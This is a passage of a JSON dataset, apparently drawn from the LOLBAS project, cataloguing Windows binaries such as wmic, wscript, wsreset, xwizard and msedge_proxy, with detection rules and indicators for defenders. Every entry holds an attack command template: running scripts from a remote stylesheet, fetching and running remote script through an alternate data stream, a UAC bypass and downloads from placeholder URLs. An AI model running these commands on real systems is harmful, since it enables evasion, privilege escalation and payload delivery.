dpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:4","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wmic.exe process get brief /format:\"{PATH_SMB:.xsl}\"","description":"Executes JScript or VBScript embedded in the target remote XSL stylsheet.","usecase":"Execute script from remote system","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:5","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"wmic.exe datafile where \"Name='C:\\\\windows\\\\system32\\\\calc.exe'\" call Copy \"C:\\\\users\\\\public\\\\calc.exe\"","description":"Copy file from source to destination.","usecase":"Copy file.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:wmic-exe:6","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WMIC.exe /Namespace:\\\\\\\\root\\\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState","description":"Executes WMIC to gather the existing Antivirus or EDR solution installed on the machine.","usecase":"Recon","mitre":["T1518.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"]},{"id":"lolbas:workfolders-exe:0","toolId":"lolbas:workfolders-exe","toolName":"WorkFolders.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WorkFolders","description":"Execute `control.exe` in the current working directory","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"},{"type":"IOC","value":"WorkFolders.exe should not be run on a normal workstation"},{"type":"IOC","value":"Registry modification to HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"}],"references":["https://www.ctus.io/2021/04/12/exploading/","https://twitter.com/ElliotKillick/status/1449812843772227588","https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"]},{"id":"lolbas:workfolders-exe:1","toolId":"lolbas:workfolders-exe","toolName":"WorkFolders.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WorkFolders","description":"`WorkFolders` attempts to execute `control.exe`. By modifying the default value of the App Paths registry key for `control.exe` in `HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe`, an attacker can achieve proxy execution.","usecase":"Proxy execution of a malicious payload via App Paths registry hijacking.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"},{"type":"IOC","value":"WorkFolders.exe should not be run on a normal workstation"},{"type":"IOC","value":"Registry modification to HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"}],"references":["https://www.ctus.io/2021/04/12/exploading/","https://twitter.com/ElliotKillick/status/1449812843772227588","https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"]},{"id":"lolbas:wscript-exe:0","toolId":"lolbas:wscript-exe","toolName":"Wscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"wscript //e:vbscript {PATH}:script.vbs","description":"Execute script stored in an alternate data stream","usecase":"Execute hidden code to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wscript.exe executing code from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into wscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Wscript/"]},{"id":"lolbas:wscript-exe:1","toolId":"lolbas:wscript-exe","toolName":"Wscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"echo GetObject(\"script:{REMOTEURL:.js}\") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js","description":"Download and execute script stored in an alternate data stream","usecase":"Execute hidden code to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wscript.exe executing code from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into wscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Wscript/"]},{"id":"lolbas:wsreset-exe:0","toolId":"lolbas:wsreset-exe","toolName":"Wsreset.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"wsreset.exe","description":"During startup, wsreset.exe checks the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsreset.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml#"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml"},{"type":"IOC","value":"wsreset.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"},{"type":"IOC","value":"Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen"}],"references":["https://www.activecyber.us/activelabs/windows-uac-bypass","https://twitter.com/ihack4falafel/status/1106644790114947073","https://github.com/hfiref0x/UACME/blob/master/README.md","https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"]},{"id":"lolbas:wuauclt-exe:0","toolId":"lolbas:wuauclt-exe","toolName":"wuauclt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer","description":"Loads and executes DLL code on attach.","usecase":"Execute dll via attach/detach methods","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wuauclt.exe","C:\\Windows\\UUS\\amd64\\wuauclt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml"},{"type":"IOC","value":"wuauclt run with a parameter of a DLL path"},{"type":"IOC","value":"Suspicious wuauclt Internet/network connections"}],"references":["https://dtm.uk/wuauclt/","https://lolbas-project.github.io/lolbas/Binaries/wuauclt/"]},{"id":"lolbas:xwizard-exe:0","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}","description":"Xwizard.exe running a custom class that has been added to the registry.","usecase":"Run a com object created in registry to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"]},{"id":"lolbas:xwizard-exe:1","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}","description":"Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.","usecase":"Run a com object created in registry to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"]},{"id":"lolbas:xwizard-exe:2","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL}","description":"Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"]},{"id":"lolbas:msedge-proxy-exe:0","toolId":"lolbas:msedge-proxy-exe","toolName":"msedge_proxy.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe {REMOTEURL:.zip}","description":"msedge_proxy will download malicious file.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"]},{"id":"lolbas:msedge-proxy-exe:1","toolId":"lolbas:msedge-proxy-exe","toolName":"msedge_proxy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"msedge_proxy.exe will execute file in the background","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"]},{"id":"lolbas:msedgewebview2-exe:0","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --no-sandbox --browser-subprocess-path=\"{PATH_ABSOLUTE:.exe}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"]},{"id":"lolbas:msedgewebview2-exe:1","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe 